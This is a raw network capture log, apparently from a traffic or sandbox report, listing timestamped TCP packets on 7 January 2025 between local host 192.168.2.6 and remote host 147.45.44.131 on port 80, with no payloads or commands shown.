                                                                          Jan 7, 2025 06:12:05.131320953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131329060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131355047 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131357908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131376028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131386042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131396055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131402969 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131421089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131432056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131437063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131448984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131459951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131469965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131479979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131484032 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131485939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131500006 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131510019 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131510973 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131524086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131534100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.131536007 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.131561995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217199087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217216015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217231035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217241049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217273951 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217355967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217372894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217384100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217391968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217396021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217406988 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217417002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217422009 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217422962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217434883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217444897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217451096 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217457056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217483044 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217500925 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217752934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217766047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217781067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217788935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217792034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217803955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217813015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217819929 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217823982 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217834949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.217844009 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.217869043 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.218132019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218167067 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.218178034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218211889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218244076 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.218246937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218260050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218270063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218281031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.218297005 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.218312979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224497080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224517107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224526882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224536896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224559069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224565983 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224594116 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224673986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224685907 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224695921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224716902 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224729061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224735975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224744081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224759102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224771023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224776983 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224795103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224807024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224813938 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224817991 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224829912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224841118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224853039 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.224857092 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224898100 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.224992037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225004911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225017071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225028038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225034952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225045919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225056887 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225158930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225171089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225181103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225192070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225202084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225208044 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225234985 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225307941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225318909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225332022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225342989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225347996 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225356102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225382090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225501060 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225512981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225523949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225534916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225543976 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225545883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225558043 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225569010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225573063 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225580931 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225588083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225601912 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225617886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225624084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225629091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225686073 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225792885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225805044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225816965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225826979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225832939 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225838900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225850105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225857019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.225862980 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.225887060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226142883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226155043 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226166010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226176977 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226183891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226188898 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226195097 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226202965 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226207018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226219893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226231098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226232052 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226243019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226248026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226255894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226286888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226299047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226310015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226320028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226330042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226332903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226341963 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226352930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226356030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226366043 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226382017 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226393938 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226501942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226516008 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226526976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226537943 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226545095 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226548910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226561069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226572037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226572990 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226589918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226602077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226608038 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226612091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226624012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226632118 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226634026 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226646900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226661921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226674080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226681948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226685047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226697922 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.226699114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.226715088 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313083887 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313116074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313133955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313143969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313152075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313163042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313180923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313191891 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313194036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313204050 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313205957 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313218117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313226938 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313237906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313241959 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313255072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313267946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313277006 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313277006 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313287973 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313302040 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313321114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313325882 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313347101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313358068 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313368082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313378096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313388109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313395977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313396931 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313409090 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313419104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313425064 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313452959 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313497066 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313513994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313523054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313534021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313544035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313546896 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313555002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.313566923 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.313586950 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.316867113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.316889048 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.316900969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.316910982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.316946983 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.316966057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.316976070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.316997051 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317007065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317019939 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317029953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317039967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317044973 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317051888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317085028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317095041 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317111015 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317116976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317117929 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317135096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317157030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317161083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317172050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317182064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317205906 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317233086 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317255974 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317266941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317285061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317300081 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317301035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317312002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317321062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317337990 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317339897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317351103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317353010 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317373037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317384005 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317394972 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317425013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317454100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317460060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317464113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317500114 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317503929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317514896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317543030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317570925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317581892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317593098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317604065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317619085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317619085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317655087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317666054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317675114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317701101 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317708015 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317709923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317722082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317761898 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317780018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317790985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317800045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317810059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317820072 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317821026 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317843914 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317857981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317867994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317884922 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317894936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.317907095 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.317935944 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318049908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318061113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318070889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318082094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318092108 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318097115 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318109035 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318135977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318190098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318201065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318227053 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318238020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318243027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318247080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318265915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318268061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318285942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318296909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318306923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318316936 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318316936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318329096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318337917 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318341017 CET8049712147.45.44.131192.168.2.6
